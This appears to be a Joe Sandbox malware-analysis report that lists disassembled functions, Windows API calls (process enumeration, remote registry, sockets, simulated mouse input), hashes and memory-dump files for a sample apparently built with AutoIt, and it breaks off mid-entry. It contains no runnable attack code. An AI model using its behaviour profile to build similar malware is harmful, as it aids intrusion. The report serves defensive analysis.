                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: LongWindow$MessageSend
                                                                • String ID:
                                                                • API String ID: 2178440468-0
                                                                • Opcode ID: 6c50f521246ba5d592b60a3a2fb15f73158750e5baef51a52beaa8b9ab451075
                                                                • Instruction ID: 8df8d5821e93c375899935f0d1e053db713c83b765010f683efdd2358315c480
                                                                • Opcode Fuzzy Hash: 6c50f521246ba5d592b60a3a2fb15f73158750e5baef51a52beaa8b9ab451075
                                                                • Instruction Fuzzy Hash: 98310234600215AFDB228F58DC88F6677E9FB4A754F1541A6FA198F2B1CBB2BC40DB41
                                                                Function 003208AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003208F2
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00320918
                                                                • SysAllocString.OLEAUT32(00000000), ref: 0032091B
                                                                • SysAllocString.OLEAUT32(?), ref: 00320939
                                                                • SysFreeString.OLEAUT32(?), ref: 00320942
                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00320967
                                                                • SysAllocString.OLEAUT32(?), ref: 00320975
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                • String ID:
                                                                • API String ID: 3761583154-0
                                                                • Opcode ID: 261ff397803bcfc170d5bdd5992af8d7f70fd5f896a9d53c69bb83da0b81102d
                                                                • Instruction ID: 0378f9a6625887abfe4aa9af6d50d10107470cda2f8cefe119b8d382ce4e96f7
                                                                • Opcode Fuzzy Hash: 261ff397803bcfc170d5bdd5992af8d7f70fd5f896a9d53c69bb83da0b81102d
                                                                • Instruction Fuzzy Hash: 0321A976601219AF9B159F78DC88DBB73ACEF09360B018125F915DB162DB70EC45CB64
                                                                Function 00322472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __wcsnicmp
                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                • API String ID: 1038674560-2734436370
                                                                • Opcode ID: d792e057eb8e7aafa8904e9892301b3290f31381c45b409ed13139367701c484
                                                                • Instruction ID: c8378f040eb4c655a02da1f49d224d2fd29d5f98c8c87e2959f30ec0173134c4
                                                                • Opcode Fuzzy Hash: d792e057eb8e7aafa8904e9892301b3290f31381c45b409ed13139367701c484
                                                                • Instruction Fuzzy Hash: D3213A3110413577D333BA25AD12EB7B39CEF65300F61C42AF5459B181E7559942C2A5
                                                                Function 00320986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003209CB
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003209F1
                                                                • SysAllocString.OLEAUT32(00000000), ref: 003209F4
                                                                • SysAllocString.OLEAUT32 ref: 00320A15
                                                                • SysFreeString.OLEAUT32 ref: 00320A1E
                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00320A38
                                                                • SysAllocString.OLEAUT32(?), ref: 00320A46
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                • String ID:
                                                                • API String ID: 3761583154-0
                                                                • Opcode ID: f619b46129f7a8568ffb4680137492eac61f8c8da52e3e8050db91225637de7a
                                                                • Instruction ID: e111351ff1905a85fba06df68c54859fd2435986367b1dd0b448b0082aad823d
                                                                • Opcode Fuzzy Hash: f619b46129f7a8568ffb4680137492eac61f8c8da52e3e8050db91225637de7a
                                                                • Instruction Fuzzy Hash: 50217775600214AFDB159FA8DC88D6B77ECEF08360B418125F909CB261DA70EC458B64
                                                                Function 0034A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002FD1BA
                                                                  • Part of subcall function 002FD17C: GetStockObject.GDI32(00000011), ref: 002FD1CE
                                                                  • Part of subcall function 002FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 002FD1D8
                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0034A32D
                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0034A33A
                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0034A345
                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0034A354
                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0034A360
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                • String ID: Msctls_Progress32
                                                                • API String ID: 1025951953-3636473452
                                                                • Opcode ID: 1ed7efbb35a0bbde196d0586109dc0977b17d804ac064a61b1c0549c853e3467
                                                                • Instruction ID: 33e3c62cd052f465b186560234aca9b94844a16af970611a6e763bf9377b628a
                                                                • Opcode Fuzzy Hash: 1ed7efbb35a0bbde196d0586109dc0977b17d804ac064a61b1c0549c853e3467
                                                                • Instruction Fuzzy Hash: F1118EB5150219BEEF129F64CC85EEB7F6DFF09798F014114FA08A60A0C672AC21DBA4
                                                                Function 002FCCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetClientRect.USER32(?,?), ref: 002FCCF6
                                                                • GetWindowRect.USER32(?,?), ref: 002FCD37
                                                                • ScreenToClient.USER32(?,?), ref: 002FCD5F
                                                                • GetClientRect.USER32(?,?), ref: 002FCE8C
                                                                • GetWindowRect.USER32(?,?), ref: 002FCEA5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Rect$Client$Window$Screen
                                                                • String ID:
                                                                • API String ID: 1296646539-0
                                                                • Opcode ID: 90161c03d051f36f08c9fc058b80954ce7a70a2d3ce016d5bd77668d97fd420a
                                                                • Instruction ID: 507f929dc8774272c08229c4a227c7b1bf48ae1bbaca5e46c3c0bcd37a8c7f54
                                                                • Opcode Fuzzy Hash: 90161c03d051f36f08c9fc058b80954ce7a70a2d3ce016d5bd77668d97fd420a
                                                                • Instruction Fuzzy Hash: 69B14B79A1024EDBDF14CFA8C5807EDBBB1FF08340F248569ED599B250DB70AA64CB54
                                                                Function 00341BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00341C18
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00341C26
                                                                • __wsplitpath.LIBCMT ref: 00341C54
                                                                  • Part of subcall function 00301DFC: __wsplitpath_helper.LIBCMT ref: 00301E3C
                                                                • _wcscat.LIBCMT ref: 00341C69
                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00341CDF
                                                                • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00341CF1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                • String ID:
                                                                • API String ID: 1380811348-0
                                                                • Opcode ID: 4c0bd5a3587fadb3cfa22756658453c287f227917f10e8007ba5f9eeaf78fb72
                                                                • Instruction ID: 4f00a3985fe08511ab146c5c1f169f9a8ed154e0396fa2de64eee946bbacb193
                                                                • Opcode Fuzzy Hash: 4c0bd5a3587fadb3cfa22756658453c287f227917f10e8007ba5f9eeaf78fb72
                                                                • Instruction Fuzzy Hash: 6F51AEB15043409FD321EF24C885EABB7ECEF88754F40492EF5859B291DB70E914CB92
                                                                Function 00342FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00343C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00342BB5,?,?), ref: 00343C1D
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003430AF
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003430EF
                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00343112
                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0034313B
                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0034317E
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0034318B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                • String ID:
                                                                • API String ID: 3451389628-0
                                                                • Opcode ID: bca05e857825db54f84d7094400b6ac3897b0b329bcc5e14266175026f44e8ef
                                                                • Instruction ID: 095f876df509ece94ab5cc6fb4439aff9dfc35a60fd100b44479ca0f7d84caab
                                                                • Opcode Fuzzy Hash: bca05e857825db54f84d7094400b6ac3897b0b329bcc5e14266175026f44e8ef
                                                                • Instruction Fuzzy Hash: 77516631218240AFC706EF64C885EAABBE9FF88304F04891DF5458B2A1DB71EA15CB52
                                                                Function 003484DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetMenu.USER32(?), ref: 00348540
                                                                • GetMenuItemCount.USER32(00000000), ref: 00348577
                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0034859F
                                                                • GetMenuItemID.USER32(?,?), ref: 0034860E
                                                                • GetSubMenu.USER32(?,?), ref: 0034861C
                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0034866D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Menu$Item$CountMessagePostString
                                                                • String ID:
                                                                • API String ID: 650687236-0
                                                                • Opcode ID: 59a1b7c69a8abc8c3a7daa210d703edb05c90b6b33053548b19cf19dfa2d58c7
                                                                • Instruction ID: f07fcbbfe5fabbc5be56054c159d7bda16a7af83189f6690cc8a74aaae80fbce
                                                                • Opcode Fuzzy Hash: 59a1b7c69a8abc8c3a7daa210d703edb05c90b6b33053548b19cf19dfa2d58c7
                                                                • Instruction Fuzzy Hash: 7C519F31E00114EFCB12EF55C941AAEB7F8EF48710F1244A9EA15BB351CB74BE418B90
                                                                Function 00324AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 00324B10
                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00324B5B
                                                                • IsMenu.USER32(00000000), ref: 00324B7B
                                                                • CreatePopupMenu.USER32 ref: 00324BAF
                                                                • GetMenuItemCount.USER32(000000FF), ref: 00324C0D
                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00324C3E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                • String ID:
                                                                • API String ID: 3311875123-0
                                                                • Opcode ID: 132555a06ad71fd9daa709f59ef7cf1813310681292bf7c0233c95b3268053d8
                                                                • Instruction ID: 6748bdd20490320797474815c52b8c7079f78b9ddff27d8617e67c3a1e62a919
                                                                • Opcode Fuzzy Hash: 132555a06ad71fd9daa709f59ef7cf1813310681292bf7c0233c95b3268053d8
                                                                • Instruction Fuzzy Hash: A4511570A01379EFCF22CF68E888BADBBF8AF44314F148119E455AB291E3B0D940CB51
                                                                Function 00338DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0037DC00), ref: 00338E7C
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00338E89
                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00338EAD
                                                                • #16.WSOCK32(?,?,00000000,00000000), ref: 00338EC5
                                                                • _strlen.LIBCMT ref: 00338EF7
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00338F6A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$_strlenselect
                                                                • String ID:
                                                                • API String ID: 2217125717-0
                                                                • Opcode ID: 799bbdfbbc1fe9029a37989b5958deb6ed316f4bc419062e156d22f44270a15f
                                                                • Instruction ID: b2ede3491cf0be7eb99d09581a29092b5aa3eb7e94e678d24de2164dab16806a
                                                                • Opcode Fuzzy Hash: 799bbdfbbc1fe9029a37989b5958deb6ed316f4bc419062e156d22f44270a15f
                                                                • Instruction Fuzzy Hash: 35419171A00204AFCB15EFA4DDD5EAEB7BDAF48314F104659F51A97291DF70AE40CB60
                                                                Function 002FABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FB34E: GetWindowLongW.USER32(?,000000EB), ref: 002FB35F
                                                                • BeginPaint.USER32(?,?,?), ref: 002FAC2A
                                                                • GetWindowRect.USER32(?,?), ref: 002FAC8E
                                                                • ScreenToClient.USER32(?,?), ref: 002FACAB
                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002FACBC
                                                                • EndPaint.USER32(?,?,?,?,?), ref: 002FAD06
                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0035E673
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                • String ID:
                                                                • API String ID: 2592858361-0
                                                                • Opcode ID: 575c9ae783bbfd3b90bb45ba7cde8339bb94e7502caa7d1ce19ecc1a4fdd1c4b
                                                                • Instruction ID: c4e57984603b0ff85b99a1f5beaa2fd7ee302cb79ecad527227f6dc94a18ea38
                                                                • Opcode Fuzzy Hash: 575c9ae783bbfd3b90bb45ba7cde8339bb94e7502caa7d1ce19ecc1a4fdd1c4b
                                                                • Instruction Fuzzy Hash: 3441D3B15003059FC712DF14CC84F76BBECEB5A3A0F040269FAA8872B1C771A954DB62
                                                                Function 0034E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ShowWindow.USER32(003A1628,00000000,003A1628,00000000,00000000,003A1628,?,0035DC5D,00000000,?,00000000,00000000,00000000,?,0035DAD1,00000004), ref: 0034E40B
                                                                • EnableWindow.USER32(00000000,00000000), ref: 0034E42F
                                                                • ShowWindow.USER32(003A1628,00000000), ref: 0034E48F
                                                                • ShowWindow.USER32(00000000,00000004), ref: 0034E4A1
                                                                • EnableWindow.USER32(00000000,00000001), ref: 0034E4C5
                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0034E4E8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$Show$Enable$MessageSend
                                                                • String ID:
                                                                • API String ID: 642888154-0
                                                                • Opcode ID: 2127a4a8555add30cf1ad9a946649126238ed69cfd77dd023d6730b553174ea3
                                                                • Instruction ID: c69bbdd567146b2c86fb9e0e38f95e926ea2bf5ea994d5e34ac4fa0c477361e4
                                                                • Opcode Fuzzy Hash: 2127a4a8555add30cf1ad9a946649126238ed69cfd77dd023d6730b553174ea3
                                                                • Instruction Fuzzy Hash: 08416A34A01150EFDB23CF29C499B947BE1BF09314F5A81A9EA598F2A2C771F842CB51
                                                                Function 003298BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 003298D1
                                                                  • Part of subcall function 002FF4EA: std::exception::exception.LIBCMT ref: 002FF51E
                                                                  • Part of subcall function 002FF4EA: __CxxThrowException@8.LIBCMT ref: 002FF533
                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00329908
                                                                • EnterCriticalSection.KERNEL32(?), ref: 00329924
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0032999E
                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003299B3
                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 003299D2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                • String ID:
                                                                • API String ID: 2537439066-0
                                                                • Opcode ID: b61f9010fce8f501cb0748da59e30d934535839d8db876e7f962b4c7c60694cf
                                                                • Instruction ID: e931f3435225e3b98efe4dc5e6964860326c7bcee1a833ae05eed498caac6608
                                                                • Opcode Fuzzy Hash: b61f9010fce8f501cb0748da59e30d934535839d8db876e7f962b4c7c60694cf
                                                                • Instruction Fuzzy Hash: 55318F31A00115EBDB01AFA5DD85EAFB778FF45710F1480BAFA04AB256D770DA10CBA0
                                                                Function 00339B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,003377F4,?,?,00000000,00000001), ref: 00339B53
                                                                  • Part of subcall function 00336544: GetWindowRect.USER32(?,?), ref: 00336557
                                                                • GetDesktopWindow.USER32 ref: 00339B7D
                                                                • GetWindowRect.USER32(00000000), ref: 00339B84
                                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00339BB6
                                                                  • Part of subcall function 00327A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00327AD0
                                                                • GetCursorPos.USER32(?), ref: 00339BE2
                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00339C44
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                • String ID:
                                                                • API String ID: 4137160315-0
                                                                • Opcode ID: 7aa128b60873b43bac9a76372007368eec249383e7574829f5ff72b3107aaba4
                                                                • Instruction ID: 3a580d1430b43e0d0991055f59c0286b8265a98b0c027c59caeb52bb909b2075
                                                                • Opcode Fuzzy Hash: 7aa128b60873b43bac9a76372007368eec249383e7574829f5ff72b3107aaba4
                                                                • Instruction Fuzzy Hash: B731CF72604319ABD711DF18DC89F9AB7EDFF89314F00092AF585D7181DAB1EA04CB92
                                                                Function 0031AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                Download Yara Rule
                                                                APIs
